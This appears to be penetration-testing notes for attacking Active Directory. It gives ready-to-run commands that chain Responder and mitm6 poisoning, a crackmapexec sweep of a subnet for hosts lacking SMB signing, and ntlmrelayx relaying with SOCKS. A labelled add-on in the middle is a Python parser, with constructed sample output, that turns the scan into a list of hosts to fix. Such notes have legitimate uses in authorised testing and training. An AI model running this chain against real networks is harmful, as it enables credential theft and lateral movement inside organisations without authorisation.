AD Attacks
1 - Running Responder
./Responder.py -I eth0
2 - Mitm6 (run simultaneously with Responder)
mitm6 -i eth0
3 - CrackMapExec
Install first
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt update
sudo apt install python3.8 python3.8-dev python3.8-venv
python3.8 -m venv python3.8-venv
source python3.8-venv/bin/activate
pip install --upgrade pip
pip3 install crackmapexec
Run alongside steps 1 and 2 to list hosts with SMB signing set to False:
crackmapexec smb 10.2.55.0/20 --gen-relay-list relay-hosts.txt | grep "signing:False"
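Added example (not part of the original notes or of crackmapexec): a parser that turns the scan output from step 3 into a list of hosts where SMB signing still needs to be enforced. It keys on the signing field only, because a bare match on "False" also catches the SMBv1 field. The sample lines, host names and addresses are constructed, and the banner layout is an assumption.

```python
import re

# Constructed sample lines, modelled on crackmapexec's SMB host banner
# (assumed field layout: "(name:..) (domain:..) (signing:..) (SMBv1:..)").
SAMPLE_OUTPUT = """\
SMB         10.2.48.10      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:evil.corp) (signing:True) (SMBv1:False)
SMB         10.2.48.21      445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:evil.corp) (signing:False) (SMBv1:True)
SMB         10.2.48.35      445    WS-ACCT-07       [*] Windows 10 Build 19041 x64 (name:WS-ACCT-07) (domain:evil.corp) (signing:False) (SMBv1:False)
"""

HOST_RE = re.compile(r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+\S+\s")
FIELD_RE = re.compile(r"\((?P<key>\w+):(?P<value>[^)]*)\)")


def parse_hosts(output):
    """Return one dict per host banner line: ip plus the parenthesised fields."""
    hosts = []
    for line in output.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # skip blank lines and non-banner output
        fields = {f["key"].lower(): f["value"] for f in FIELD_RE.finditer(line)}
        if "signing" not in fields:
            continue  # banner without a signing field: do not guess
        hosts.append({"ip": m["ip"], **fields})
    return hosts


def signing_not_enforced(hosts):
    """Hosts whose signing field is False; the SMBv1 field is ignored."""
    return [h for h in hosts if h["signing"].lower() == "false"]


def naive_false_match(output):
    """What a plain grep "False" keeps: any line containing the word."""
    return [line for line in output.splitlines() if "False" in line]


if __name__ == "__main__":
    # Tab-separated remediation list: one row per host that needs the fix.
    for h in signing_not_enforced(parse_hosts(SAMPLE_OUTPUT)):
        print(f'{h["ip"]}\t{h["name"]}\tSMBv1={h["smbv1"]}\tenforce SMB signing')
```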
4 - Run Mitm6
mitm6 -d evil.corp
5 - Run Ntlmrelayx with Mitm6
Run together with step 4 for relays:
ntlmrelayx.py -6 -socks -smb2support -tf relay-hosts.txt